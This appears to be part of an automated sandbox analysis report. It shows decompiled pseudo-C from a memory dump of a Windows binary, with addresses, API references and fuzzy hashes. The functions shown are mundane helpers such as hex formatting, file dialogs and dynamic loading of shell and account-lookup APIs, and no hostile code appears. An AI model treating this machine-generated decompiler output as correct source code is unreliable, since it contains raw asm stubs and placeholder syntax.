                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: _snwprintf
                                                                                      • String ID: Line%d$Lines
                                                                                      • API String ID: 3988819677-2790224864
                                                                                      • Opcode ID: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                      • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                                      • Opcode Fuzzy Hash: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                      • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040512F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 70%
                                                                                      			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040B1EC();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}













                                                                                      0x00405132
                                                                                      0x00405135
                                                                                      0x00405139
                                                                                      0x0040513e
                                                                                      0x00405141
                                                                                      0x004051b3
                                                                                      0x00405143
                                                                                      0x00405145
                                                                                      0x00405147
                                                                                      0x0040514c
                                                                                      0x0040514e
                                                                                      0x00405151
                                                                                      0x00405151
                                                                                      0x0040515b
                                                                                      0x0040515c
                                                                                      0x0040515d
                                                                                      0x0040515e
                                                                                      0x0040515f
                                                                                      0x00405168
                                                                                      0x00405169
                                                                                      0x00405171
                                                                                      0x00405173
                                                                                      0x00405174
                                                                                      0x00405182
                                                                                      0x00405184
                                                                                      0x00405189
                                                                                      0x0040518c
                                                                                      0x00405194
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405196
                                                                                      0x0040519a
                                                                                      0x0040519b
                                                                                      0x004051a1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004051a1
                                                                                      0x004051a3
                                                                                      0x004051a3
                                                                                      0x004051a6
                                                                                      0x004051af
                                                                                      0x004051b0
                                                                                      0x004051b7

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: _snwprintfmemcpy
                                                                                      • String ID: %2.2X
                                                                                      • API String ID: 2789212964-323797159
                                                                                      • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                      • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                                      • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                      • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004075BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 43%
                                                                                      			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				char _v44;
				intOrPtr _t22;
				signed int _t30;
				signed int _t34;
				void* _t35;
				void* _t36;

				_t35 = __esi;
				_t34 = 0;
				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
					do {
						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
						L0040B1EC();
						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
						_push( &_v44);
						_push(0x2000);
						_push( *((intOrPtr*)(__esi + 0x60)));
						L0040B1EC();
						_t36 = _t36 + 0x24;
						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
				}
				return E00407343(_t35, _a4, L"\r\n");
			}









                                                                                      0x004075bb
                                                                                      0x004075c2
                                                                                      0x004075c7
                                                                                      0x004075ca
                                                                                      0x004075cd
                                                                                      0x004075d8
                                                                                      0x004075e9
                                                                                      0x004075fc
                                                                                      0x00407600
                                                                                      0x00407601
                                                                                      0x00407606
                                                                                      0x00407609
                                                                                      0x0040760e
                                                                                      0x00407619
                                                                                      0x0040761e
                                                                                      0x0040761f
                                                                                      0x00407624
                                                                                      0x00407636

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: _snwprintf
                                                                                      • String ID: %%-%d.%ds
                                                                                      • API String ID: 3988819677-2008345750
                                                                                      • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                      • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                                      • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                      • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}















                                                                                      0x00405080
                                                                                      0x00405086
                                                                                      0x0040508b
                                                                                      0x0040508e
                                                                                      0x00405091
                                                                                      0x00405097
                                                                                      0x0040509d
                                                                                      0x004050a4
                                                                                      0x004050ab
                                                                                      0x004050b2
                                                                                      0x004050b5
                                                                                      0x004050bc
                                                                                      0x004050cb
                                                                                      0x004050e0
                                                                                      0x004050cd
                                                                                      0x004050d1
                                                                                      0x004050dc
                                                                                      0x004050dc

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: FileNameOpenwcscpy
                                                                                      • String ID: L
                                                                                      • API String ID: 3246554996-2909332022
                                                                                      • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                      • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                                      • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                      • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 58%
                                                                                      			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}







                                                                                      0x00409072
                                                                                      0x00409074
                                                                                      0x0040907d
                                                                                      0x00409086
                                                                                      0x0040908e
                                                                                      0x004090a5
                                                                                      0x004090a5
                                                                                      0x0040908e
                                                                                      0x004090ac

                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressProc
                                                                                      • String ID: LookupAccountSidW$Y@
                                                                                      • API String ID: 190572456-2352570548
                                                                                      • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                      • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                                      • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                      • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040AD85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 37%
                                                                                      			E0040AD85(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;
				char** _t9;

				_t7 = 0;
				_t8 = E00405436(L"shlwapi.dll");
				 *_t9 = "SHAutoComplete";
				_t3 = GetProcAddress(_t8, ??);
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}







                                                                                      0x0040ad8c
                                                                                      0x0040ad93
                                                                                      0x0040ad95
                                                                                      0x0040ad9d
                                                                                      0x0040ada5
                                                                                      0x0040adb2
                                                                                      0x0040adb2
                                                                                      0x0040adb5
                                                                                      0x0040adbf

                                                                                      APIs
                                                                                        • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                        • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                      • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                      • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                                      • String ID: shlwapi.dll
                                                                                      • API String ID: 4092907564-3792422438
                                                                                      • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                      • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                                      • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                      • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00406597(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00404AD9(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}





                                                                                      0x00406597
                                                                                      0x00406598
                                                                                      0x004065a0
                                                                                      0x004065aa
                                                                                      0x004065ac
                                                                                      0x004065ac
                                                                                      0x004065bd

                                                                                      APIs
                                                                                        • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                      • wcsrchr.MSVCRT ref: 004065A0
                                                                                      • wcscat.MSVCRT ref: 004065B6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: FileModuleNamewcscatwcsrchr
                                                                                      • String ID: _lng.ini
                                                                                      • API String ID: 383090722-1948609170
                                                                                      • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                      • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                                      • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                      • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                                      0x0040ac59
                                                                                      0x0040ac60
                                                                                      0x0040ac68
                                                                                      0x0040ac6d
                                                                                      0x0040ac75
                                                                                      0x0040ac7b
                                                                                      0x00000000
                                                                                      0x0040ac7b
                                                                                      0x0040ac6d
                                                                                      0x0040ac80

                                                                                      APIs
                                                                                        • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                        • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                      • API String ID: 946536540-880857682
                                                                                      • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                      • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                                      • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                      • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 90%
                                                                                      			E00406670(char** __esi, void* __eflags) {
				char* _t30;
				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}





                                                                                      0x00406670
                                                                                      0x0040667a
                                                                                      0x00406680
                                                                                      0x00406686
                                                                                      0x0040668b
                                                                                      0x0040668d
                                                                                      0x00406693
                                                                                      0x00406699
                                                                                      0x0040669f
                                                                                      0x004066a9
                                                                                      0x004066ac
                                                                                      0x004066af
                                                                                      0x004066b9
                                                                                      0x004066c7
                                                                                      0x004066d9
                                                                                      0x004066c9
                                                                                      0x004066c9
                                                                                      0x004066cc
                                                                                      0x004066cf
                                                                                      0x004066d2
                                                                                      0x004066d5
                                                                                      0x004066d5
                                                                                      0x004066db
                                                                                      0x004066dd
                                                                                      0x004066e0
                                                                                      0x004066e8
                                                                                      0x004066fa
                                                                                      0x004066ea
                                                                                      0x004066ea
                                                                                      0x004066ed
                                                                                      0x004066f0
                                                                                      0x004066f3
                                                                                      0x004066f6
                                                                                      0x004066f6
                                                                                      0x004066fc
                                                                                      0x004066fe
                                                                                      0x00406701
                                                                                      0x00406709
                                                                                      0x0040671b
                                                                                      0x0040670b
                                                                                      0x0040670b
                                                                                      0x0040670e
                                                                                      0x00406711
                                                                                      0x00406714
                                                                                      0x00406717
                                                                                      0x00406717
                                                                                      0x0040671d
                                                                                      0x0040671f
                                                                                      0x00406722
                                                                                      0x0040672a
                                                                                      0x0040673c
                                                                                      0x0040672c
                                                                                      0x0040672c
                                                                                      0x0040672f
                                                                                      0x00406732
                                                                                      0x00406735
                                                                                      0x00406738
                                                                                      0x00406738
                                                                                      0x0040673f
                                                                                      0x00406745

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ??2@$memset
                                                                                      • String ID:
                                                                                      • API String ID: 1860491036-0
                                                                                      • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                      • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                                      • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                      • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004054DF, Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E00404951(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}















                                                                                      0x004054ea
                                                                                      0x004054ec
                                                                                      0x004054f1
                                                                                      0x004054f4
                                                                                      0x004054f7
                                                                                      0x004054fa
                                                                                      0x004054fe
                                                                                      0x00405501
                                                                                      0x00405505
                                                                                      0x00405508
                                                                                      0x0040550b
                                                                                      0x0040551b
                                                                                      0x0040550d
                                                                                      0x0040550f
                                                                                      0x0040550f
                                                                                      0x00405521
                                                                                      0x00405527
                                                                                      0x0040552b
                                                                                      0x0040552e
                                                                                      0x0040553f
                                                                                      0x00405530
                                                                                      0x00405532
                                                                                      0x00405532
                                                                                      0x00405556
                                                                                      0x00405561
                                                                                      0x0040556e
                                                                                      0x00405571
                                                                                      0x00405578
                                                                                      0x0040557e

                                                                                      APIs
                                                                                      • wcslen.MSVCRT ref: 004054EC
                                                                                      • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                                        • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                                        • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                                        • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                      • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                                      • memcpy.MSVCRT ref: 00405556
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                      • String ID:
                                                                                      • API String ID: 726966127-0
                                                                                      • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                      • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                                      • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                      • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405ADF, Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 81%
                                                                                      			E00405ADF() {
				void* _t25;
				signed int _t27;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x41c470;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x41c470 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41c474 = 0x100;
					 *0x41c478 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27);
					L0040B26C();
					 *0x41c458 = _t27;
					_t52 = 4;
					_t29 =  *0x41c474 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
